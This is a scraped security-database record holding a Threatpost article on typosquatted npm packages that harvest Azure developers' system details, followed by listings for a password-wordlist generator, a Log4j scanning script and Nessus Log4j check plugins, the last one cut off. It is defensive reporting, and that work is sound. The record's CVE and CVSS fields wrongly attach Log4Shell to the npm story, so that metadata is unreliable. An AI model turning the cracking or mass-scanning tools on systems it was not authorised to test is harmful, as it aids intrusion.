Microsoft Azure Developers Awash in PII-Stealing npm Packages

2022-03-24T20:21:02

Description

Researchers have found hundreds of malicious packages in the npm repository of open-source JavaScript code, designed to steal personally identifiable information (PII) in a large-scale typosquatting attack against Microsoft Azure cloud users. That’s according to the JFrog Security Research team, which said that the set of packages appeared earlier this week and steadily grew since then, from about 50 packages to more than 200. Typosquatting [refers to](<https://threatpost.com/attackers-use-typo-squatting-to-steal-npm-credentials/127235/>) the practice of naming a malicious copycat file, package, web address and so on with a name that is so similar to an existing legitimate offering that the casual observer might not notice the difference. An example of typosquatting would be using “www.go0gle.com” (the second “o” is actually a zero) to lure in victims to a watering hole – obviously trying to masquerade as the ubiquitous search engine. In this case, the cyberattackers were pretending to offer a key set of existing, legitimate packages for Azure. “It became apparent that this was a targeted attack against the entire @azure npm scope, by an attacker that employed an automatic script to create accounts and upload malicious packages that cover the entirety of that scope,” researchers said in a [Wednesday posting](<https://jfrog.com/blog/large-scale-npm-attack-targets-azure-developers-with-malicious-packages/>). “The attacker simply creates a new (malicious) package with the same name as an existing @azure scope package, but drops the scope name.” Npm scopes [are a way of grouping](<https://docs.microsoft.com/en-us/azure/devops/artifacts/npm/scopes?view=azure-devops>) related packages together. JFrog found that besides the @azure scope, other popular package groups were also targeted, including @azure-rest, @azure-tests, @azure-tools and @cadl-lang. The researchers added, “The attacker is relying on the fact that some developers may erroneously omit the @azure prefix when installing a package. For example, running npm install core-tracing by mistake, instead of the correct command – npm install @azure/core-tracing.” The attacker also tried to hide the fact that all of the malicious packages were uploaded by the same author, “by creating a unique user (with a randomly-generated name) per each malicious package uploaded,” according to JFrog. ## **Npm: Ripe for Software Supply-Chain Attacks** Unfortunately, while JFrog reported the packages for removal from npm itself, developers could have pulled in the malicious code to any number of applications that are still threatening Azure users. Npm is the most oft-downloaded JavaScript package repository used by developers to build web applications, and as such, has been [increasingly targeted](<https://threatpost.com/malicious-npm-packages-web-apps/178137/>) by malicious actors to carry out software supply-chain attacks. Any app using a malicious code block could be serving up data theft to its users (as in this particular case), or other threats like cryptojacking, botnet delivery and more. In this campaign, the number of Azure applications that could bring misery to users could be high, JFrog researchers warned. “Since this set of legitimate packages is downloaded tens of millions of times each week, there is a high chance that some developers will be successfully fooled by the typosquatting attack,” researchers warned. From JFrog’s assessment, the package-download numbers averaged around 50 downloads per malicious package. Due to the scale of the attack, it is obvious that the attacker used a script to upload the malicious packages, they added – which shines a spotlight on the fact that code repositories and package managers could be doing more to protect the software supply chain. “Due to the meteoric rise of supply-chain attacks, especially through [the npm](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>) and [PyPI package repositories](<https://threatpost.com/malicious-pypi-code-packages/176971/>), it seems that more scrutiny and mitigations should be added [by package managers],” according to JFrog. “For example, adding a CAPTCHA mechanism on npm user creation would not allow attackers to easily create an arbitrary amount of users from which malicious packages could be uploaded, making attack identification easier (as well as enabling blocking of packages based on heuristics on the uploading account).” ## **Npm for PII Theft & Reconnaissance** From a technical standpoint, JFrog found that the malicious code runs automatically once the package is installed, hoovering up the user’s username, home directory, current working directory, IP addresses of all network interfaces, IP addresses of configured DNS servers and the name of the (successful) attacking package. The intentions of the author remain somewhat unclear, researchers added. “We suspect that this malicious payload was either intended for initial reconnaissance on vulnerable targets (before sending a more substantial payload) or as a bug-bounty hunting attempt against Azure users (and possibly Microsoft developers),” they said. ## **Protecting Azure Apps from Malicious Packages** Azure developers should examine their code for malicious dependencies that could have been imported this week, removing any that they find. JFrog noted that this could be done fairly efficiently. “Make sure your installed packages are the legitimate ones, by checking that their name starts with the @azure* scope,” they explained. They added, this can be done by changing the current directory to the npm project in need of testing, and running the following command: _npm list | grep -f packages.txt, where “packages.txt” contains the full list of affected packages._ The full list of malicious packages can be found in JFrog’s [appendix to its posting](<https://jfrog.com/blog/large-scale-npm-attack-targets-azure-developers-with-malicious-packages/>) on the attack. _**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, “Cloud Security: The Forecast for 2022.”**_ _**We explore organizations’ top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_

{"id": "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Microsoft Azure Developers Awash in PII-Stealing npm Packages", "description": "Researchers have found hundreds of malicious packages in the npm repository of open-source JavaScript code, designed to steal personally identifiable information (PII) in a large-scale typosquatting attack against Microsoft Azure cloud users.\n\nThat\u2019s according to the JFrog Security Research team, which said that the set of packages appeared earlier this week and steadily grew since then, from about 50 packages to more than 200.\n\nTyposquatting [refers to](<https://threatpost.com/attackers-use-typo-squatting-to-steal-npm-credentials/127235/>) the practice of naming a malicious copycat file, package, web address and so on with a name that is so similar to an existing legitimate offering that the casual observer might not notice the difference. An example of typosquatting would be using \u201cwww.go0gle.com\u201d (the second \u201co\u201d is actually a zero) to lure in victims to a watering hole \u2013 obviously trying to masquerade as the ubiquitous search engine.\n\nIn this case, the cyberattackers were pretending to offer a key set of existing, legitimate packages for Azure.\n\n\u201cIt became apparent that this was a targeted attack against the entire @azure npm scope, by an attacker that employed an automatic script to create accounts and upload malicious packages that cover the entirety of that scope,\u201d researchers said in a [Wednesday posting](<https://jfrog.com/blog/large-scale-npm-attack-targets-azure-developers-with-malicious-packages/>). \u201cThe attacker simply creates a new (malicious) package with the same name as an existing @azure scope package, but drops the scope name.\u201d\n\nNpm scopes [are a way of grouping](<https://docs.microsoft.com/en-us/azure/devops/artifacts/npm/scopes?view=azure-devops>) related packages together. JFrog found that besides the @azure scope, other popular package groups were also targeted, including @azure-rest, @azure-tests, @azure-tools and @cadl-lang.\n\nThe researchers added, \u201cThe attacker is relying on the fact that some developers may erroneously omit the @azure prefix when installing a package. For example, running npm install core-tracing by mistake, instead of the correct command \u2013 npm install @azure/core-tracing.\u201d\n\nThe attacker also tried to hide the fact that all of the malicious packages were uploaded by the same author, \u201cby creating a unique user (with a randomly-generated name) per each malicious package uploaded,\u201d according to JFrog.\n\n## **Npm: Ripe for Software Supply-Chain Attacks**\n\nUnfortunately, while JFrog reported the packages for removal from npm itself, developers could have pulled in the malicious code to any number of applications that are still threatening Azure users.\n\nNpm is the most oft-downloaded JavaScript package repository used by developers to build web applications, and as such, has been [increasingly targeted](<https://threatpost.com/malicious-npm-packages-web-apps/178137/>) by malicious actors to carry out software supply-chain attacks. Any app using a malicious code block could be serving up data theft to its users (as in this particular case), or other threats like cryptojacking, botnet delivery and more.\n\nIn this campaign, the number of Azure applications that could bring misery to users could be high, JFrog researchers warned.\n\n\u201cSince this set of legitimate packages is downloaded tens of millions of times each week, there is a high chance that some developers will be successfully fooled by the typosquatting attack,\u201d researchers warned. From JFrog\u2019s assessment, the package-download numbers averaged around 50 downloads per malicious package.\n\nDue to the scale of the attack, it is obvious that the attacker used a script to upload the malicious packages, they added \u2013 which shines a spotlight on the fact that code repositories and package managers could be doing more to protect the software supply chain.\n\n\u201cDue to the meteoric rise of supply-chain attacks, especially through [the npm](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>) and [PyPI package repositories](<https://threatpost.com/malicious-pypi-code-packages/176971/>), it seems that more scrutiny and mitigations should be added [by package managers],\u201d according to JFrog. \u201cFor example, adding a CAPTCHA mechanism on npm user creation would not allow attackers to easily create an arbitrary amount of users from which malicious packages could be uploaded, making attack identification easier (as well as enabling blocking of packages based on heuristics on the uploading account).\u201d\n\n## **Npm for PII Theft & Reconnaissance**\n\nFrom a technical standpoint, JFrog found that the malicious code runs automatically once the package is installed, hoovering up the user\u2019s username, home directory, current working directory, IP addresses of all network interfaces, IP addresses of configured DNS servers and the name of the (successful) attacking package.\n\nThe intentions of the author remain somewhat unclear, researchers added.\n\n\u201cWe suspect that this malicious payload was either intended for initial reconnaissance on vulnerable targets (before sending a more substantial payload) or as a bug-bounty hunting attempt against Azure users (and possibly Microsoft developers),\u201d they said.\n\n## **Protecting Azure Apps from Malicious Packages**\n\nAzure developers should examine their code for malicious dependencies that could have been imported this week, removing any that they find. JFrog noted that this could be done fairly efficiently.\n\n\u201cMake sure your installed packages are the legitimate ones, by checking that their name starts with the @azure* scope,\u201d they explained.\n\nThey added, this can be done by changing the current directory to the npm project in need of testing, and running the following command:\n\n_npm list | grep -f packages.txt, where \u201cpackages.txt\u201d contains the full list of affected packages._\n\nThe full list of malicious packages can be found in JFrog\u2019s [appendix to its posting](<https://jfrog.com/blog/large-scale-npm-attack-targets-azure-developers-with-malicious-packages/>) on the attack.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "published": "2022-03-24T20:21:02", "modified": "2022-03-24T20:21:02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://threatpost.com/microsoft-azure-developers-pii-stealing-npm-packages/179096/", "reporter": "Tara Seals", "references": ["https://threatpost.com/attackers-use-typo-squatting-to-steal-npm-credentials/127235/", "https://jfrog.com/blog/large-scale-npm-attack-targets-azure-developers-with-malicious-packages/", "https://docs.microsoft.com/en-us/azure/devops/artifacts/npm/scopes?view=azure-devops", "https://threatpost.com/malicious-npm-packages-web-apps/178137/", "https://threatpost.com/discord-stealing-malware-npm-packages/163265/", "https://threatpost.com/malicious-pypi-code-packages/176971/", "https://jfrog.com/blog/large-scale-npm-attack-targets-azure-developers-with-malicious-packages/", "https://bit.ly/3Jy6Bfs"], "cvelist": ["CVE-2021-44228"], "immutableFields": [], "lastseen": "2022-03-24T20:26:41", "viewCount": 49, "enchantments": {"vulnersScore": "PENDING"}, "_state": {}, "_internal": {}}

{"kitploit": [{"lastseen": "2022-01-10T10:28:13", "description": "[ ![](https://1.bp.blogspot.com/-8BKmzRhQaRI/WgKXwrpeMqI/AAAAAAAAJXU/WGbSm3EXdwQ80BgHamT_ZT617l-SQBdXwCLcBGAs/s640/mentalist_6.gif) ](<https://1.bp.blogspot.com/-8BKmzRhQaRI/WgKXwrpeMqI/AAAAAAAAJXU/WGbSm3EXdwQ80BgHamT_ZT617l-SQBdXwCLcBGAs/s1600/mentalist_6.gif>)\n\n \n\n\nMentalist is a graphical tool for custom [ wordlist ](<https://www.kitploit.com/search/label/Wordlist>) generation. It utilizes common human paradigms for constructing [ passwords ](<https://www.kitploit.com/search/label/Passwords>) and can output the full [ wordlist ](<https://www.kitploit.com/search/label/Wordlist>) as well as rules compatible with [ Hashcat ](<https://hashcat.net/hashcat>) and [ John the Ripper ](<https://www.openwall.com/john>) . \n\n \n** Install from Source ** \n** \n** ** Prerequisites ** \n** \n** ** Linux (APT package manager) ** \nCheck if Python 3 is installed by running \n\n \n \n python3 --version\n\nIf it is not, run: \n\n \n \n sudo apt-get update && apt-get install python3.6\n\nAdditionally, you will need setuptools and Tk: \n\n \n \n sudo apt-get install python3-setuptools python3-tk\n\n \n** OS X ** \nThere are varying ways of installing Python 3 on OS X, but the easiest is to install through [ Homebrew ](<https://brew.sh/>) . \n\n \n \n brew update && brew install python3\n\n \n** Windows ** \nIf using Windows, please refer to [ Installing Python 3 on Windows ](<http://docs.python-guide.org/en/latest/starting/install3/win/>) from the Hitchhiker's Guide. It is also _ extremely helpful _ to click the Python 3 installer checkbox to add Python to your PATH. \n \n** Install Mentalist ** \nClone the Mentalist repository: \n\n \n \n git clone https://github.com/sc0tfree/mentalist.git\n\n \nGo into the directory: \n\n \n \n cd mentalist\n\n \nRun setup.py: \n\n \n \n python3 setup.py install\n\n \n** Running Mentalist ** \n \nYou can now run mentalist from the shell with the command \n\n \n \n mentalist\n\n \n** Future Work ** \n\n\n * Ability to scrape sites as an attribute in the Base Words node. \n * Add dictionaries and lists for more languages \n * Add UK post codes to Append/Prepend Nodes \n * Option to perform de-duplication of Base Words \n * Mentalist Chain file differencing \n \n \n\n\n** [ Download mentalist ](<https://github.com/sc0tfree/mentalist>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2017-11-13T13:23:46", "type": "kitploit", "title": "Mentalist - Graphical Tool For Custom Wordlist Generation", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2017-11-13T13:23:46", "id": "KITPLOIT:4125185526326677098", "href": "http://www.kitploit.com/2017/11/mentalist-graphical-tool-for-custom.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:01:23", "description": "[![](https://4.bp.blogspot.com/-8HJ_6FpTFUw/YdaIHTEKYpI/AAAAAAAA6lo/NMnXOCh-ZUEfbXBMB3AjoPwOGWFCVHkWACK4BGAYYCw/w640-h264/log4j-detect_1-788604.png)](<https://4.bp.blogspot.com/-8HJ_6FpTFUw/YdaIHTEKYpI/AAAAAAAA6lo/NMnXOCh-ZUEfbXBMB3AjoPwOGWFCVHkWACK4BGAYYCw/s1600/log4j-detect_1-788604.png>)\n\n \n\n\n#### Simple [Python 3](<https://www.kitploit.com/search/label/Python%203> \"Python 3\" ) script to detect the \"Log4j\" Java library [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) (CVE-2021-44228) for a list of URL with multithreading\n\n \n\n\nThe script \"log4j-detect.py\" developed in Python 3 is responsible for detecting whether a list of URLs are [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) to CVE-2021-44228.\n\nTo do so, it sends a GET request using threads (higher performance) to each of the URLs in the specified list. The GET request contains a payload that on success returns a DNS request to Burp Collaborator / interactsh. This payload is sent in a test parameter and in the \"User-Agent\" / \"Referer\" / \"X-Forwarded-For\" / \"Authentication\" headers. Finally, if a host is vulnerable, an identification number will appear in the [subdomain](<https://www.kitploit.com/search/label/Subdomain> \"subdomain\" ) prefix of the Burp Collaborator / [interactsh](<https://www.kitploit.com/search/label/Interactsh> \"interactsh\" ) payload and in the output of the script, allowing to know which host has responded via DNS.\n\nIt should be noted that this script only handles DNS detection of the vulnerability and does not test remote command execution.\n\n### Downloading log4j-detect.py\n \n \n wget https://github.com/takito1812/log4j-detect/raw/main/log4j-detect.py\n\n### Running log4j-detect.py\n \n \n python3 log4j-detect.py <urlFile> <collaboratorPayload>\n\n \n\n\n \n\n\n**[Download Log4J-Detect](<https://github.com/takito1812/log4j-detect> \"Download Log4J-Detect\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-06T11:30:00", "type": "kitploit", "title": "Log4J-Detect - Script To Detect The \"Log4j\" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Multithreading", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-06T11:30:00", "id": "KITPLOIT:1680589374755422772", "href": "http://www.kitploit.com/2022/01/log4j-detect-script-to-detect-log4j.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-01-18T23:36:14", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:1577-1 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-12-17T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1577-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-18T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:log4j", "p-cpe:/a:novell:opensuse:log4j-javadoc", "p-cpe:/a:novell:opensuse:log4j-jcl", "p-cpe:/a:novell:opensuse:log4j-slf4j", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-1577.NASL", "href": "https://www.tenable.com/plugins/nessus/156146", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:1577-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156146);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/18\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n\n script_name(english:\"openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1577-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:1577-1 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193611\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/OHVQSNSG4OZ336XWLNWGUL3TQE2ZZODK/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53a91573\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-44228\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j, log4j-javadoc, log4j-jcl and / or log4j-slf4j packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-jcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-slf4j\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.2', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'log4j-2.13.0-lp152.3.3.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-javadoc-2.13.0-lp152.3.3.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-jcl-2.13.0-lp152.3.3.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-slf4j-2.13.0-lp152.3.3.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j / log4j-javadoc / log4j-jcl / log4j-slf4j');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-30T02:21:50", "description": "The version of log4j-cve-2021-44228-hotpatch installed on the remote host is prior to 1.3-5. It is, therefore, affected by a vulnerability as referenced in the ALAS-2022-1601 advisory.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-16T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : log4j-cve-2021-44228-hotpatch (ALAS-2022-1601)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-29T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:log4j-cve-2021-44228-hotpatch", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2022-1601.NASL", "href": "https://www.tenable.com/plugins/nessus/162308", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2022-1601.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162308);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/29\");\n\n script_name(english:\"Amazon Linux AMI : log4j-cve-2021-44228-hotpatch (ALAS-2022-1601)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of log4j-cve-2021-44228-hotpatch installed on the remote host is prior to 1.3-5. It is, therefore, affected\nby a vulnerability as referenced in the ALAS-2022-1601 advisory.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2022-1601.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update log4j-cve-2021-44228-hotpatch' to update your system.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:log4j-cve-2021-44228-hotpatch\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != 